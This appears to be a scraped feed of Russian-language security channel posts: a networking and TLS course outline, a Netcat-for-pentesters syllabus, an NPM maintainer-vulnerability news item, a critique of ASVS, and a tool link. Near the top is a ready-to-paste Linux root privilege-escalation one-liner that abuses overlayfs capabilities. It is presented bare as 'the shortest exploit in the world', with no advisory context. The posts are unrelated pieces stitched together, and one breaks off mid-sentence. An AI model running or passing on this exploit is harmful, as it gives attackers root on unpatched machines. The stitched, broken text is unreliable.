Ayhan GaraBay || Айхан Гарабай

PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!

Самый короткий exploit в мире (возможно)

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

🍏 Уроки Swift для начинающих youtube.com/playlist?list=PL0lO_mIqDDFWUwhyfb8jzpMyHRZi6ABKW&si=xyEVDZm19rUSswIQ

🔒 Защищенные сетевые протоколы: • Протоколы TLS/SSL; • Шифрование в TLS/SSL; • Целостность данных в TLS/SSL; • Инфраструктура открытых ключей в TLS/SSL; • Протокол TLS; • Установка соединения в TLS; • Анализируем протокол TLS в Wireshark; • Расшифровка TLS в WireShark; • Протокол TLS 1.3; • Протокол TLS 1.3 в WireShark; • Протокол HTTPS; • Протокол HTTPS в WireShark. #RU #Курс #Сети

🐈‍⬛ Netcat для пентестера. • Для чего Netcat; • Версии Netcat; • Ncat: ваш универсальный сетевой коннектор; • Принципы работы Ncat; • Подключение к HTTP в Ncat; • Подключение через SSL (HTTPS) в Ncat; • Режим прослушивания Ncat; • Запуск команд через ncat; • Подключение к Ncat если удалённая машина находиться за NAT; • Как сделать так, чтобы при закрытии клиента Ncat, не отключался сервер Ncat; • Как передать файлы на удалённый компьютер; • Как загрузить файл с удалённого компьютера; • Как сделать веб-сервер с Ncat; • Как с помощью Ncat получить доступ к службам, доступным только в локальной сети; • Использование SSH через туннель Ncat; • Как Ncat превратить в прокси; • Как разрешить подключение к Ncat с определённых IP; • Отправка почты; • Создание цепей последовательной передачи трафика между нескольких Ncat; • Очистка от SSL; • Ncat как SSL сервер; • Сканирование портов; • Закрепление на удалённой машине; • Эмуляция диагностических служб. #Netcat #Пентест

👨‍💻 Компьютерные сети. • Общие сведения: - Классификация сетей; - Топологии компьютерных сетей; - Стандарты компьютерных сетей; - Основы организации компьютерных сетей; - Модель OSI; - Модель и стек протоколов TCP/IP; - Анализатор сети Wireshark. • Физический уровень; • Канальный уровень; • Сетевой уровень; • Транспортный уровень; • Прикладной уровень. • Защищенные сетевые протоколы: - Протоколы TLS/SSL; - Шифрование в TLS/SSL; - Целостность данных в TLS/SSL; - Инфраструктура открытых ключей в TLS/SSL; - Протокол TLS; - Установка соединения в TLS; - Анализируем протокол TLS в Wireshark; - Расшифровка TLS в WireShark; - Протокол TLS 1.3; - Протокол TLS 1.3 в WireShark; - Протокол HTTPS; - Протокол HTTPS в WireShark. • Продвинутые темы: - Протокол IPv6; - Адреса IPv6; - Автоматическое назначение IPv6 адресов; - Протокол NDP; - Протоколы маршрутизации; - Протокол RIP; - Протокол OSPF; - Иерархическая маршрутизация; - Протокол BGP; - Web сокеты. • Рекомендуемая литература: - Э.Таненбаум, Д.Уэзеролл. Компьютерные сети; - В. Г. Олифер, Н. А. Олифер. Компьютерные сети. Принципы, технологии, протоколы; - Д. Ф. Куроуз, К. В. Росс. Компьютерные сети. Нисходящий подход. #Сети #RU

Объясни разницу между

[ RPV ] rpv-web is a browser based frontend for the rpv library for analyzing RPC servers and interfaces on the Windows operating system github.com/qtc-de/rpv-web

Уязвимость в репозитории NPM, позволяющая добавить сопровождающего без подтверждения “В репозитории пакетов NPM выявлена проблема с безопасностью, позволяющая владельцу пакета добавить в число сопровождающих любого пользователя, без получения от этого пользователя согласия и без информирования о совершённом действии. Проблема усугубляется тем, что после добавления стороннего пользователя в число сопровождающих, изначальный автор пакета мог удалить себя из списка сопровождающих и сторонний пользователь оставался единственным лицом, отвечающим за пакет. Проблемой могли воспользоваться создатели вредоносных пакетов для добавления в число сопровождающих известных разработчиков или крупных компаний с целью повышения доверия пользователей и создания иллюзии, что заслуженные разработчики отвечают за пакет, хотя на деле не имеют к нему никакого отношения и даже не знают о его существовании. Например, атакующий мог разместить вредоносный пакет, сменить сопровождающего и пригласить пользователей протестировать новую разработку крупной компании. Уязвимость также могла применяться для очернения репутации определённых разработчиков, представляя их как инициаторов сомнительных акций и вредоносных действий.”

Что не так с ASVS? Мой небольшой пост в Linkedin про неправильное использование ASVS и его недостатки для неподготовленного читателя, а именно: перегруженность, большое число заимствований и оторванность от риск-ориентированного подхода. Последнее подразумевает то, что оценка на несоответствие ASVS по сути не означает, что ваша система небезопасна. Она означает несоответствие лучшим практикам, которые, на самом деле, не всегда применимы к вашему приложению и имеют смысл для инвестирования ресурсов. Тем не менее, все еще есть мнение, что ASVS это ready-to-use стандарт, требующий минимум кастомизации. В комментариях, кстати, контрибьютеры ASVS озвучили свои мысли по этому вопросу. Кроме того, оттуда же я узнал об очень классном портале OpenCRE, где агрегированы требования из разных стандартов. Используете ли вы ASVS в своей организации и как? P.S. Текст продублирован в комментариях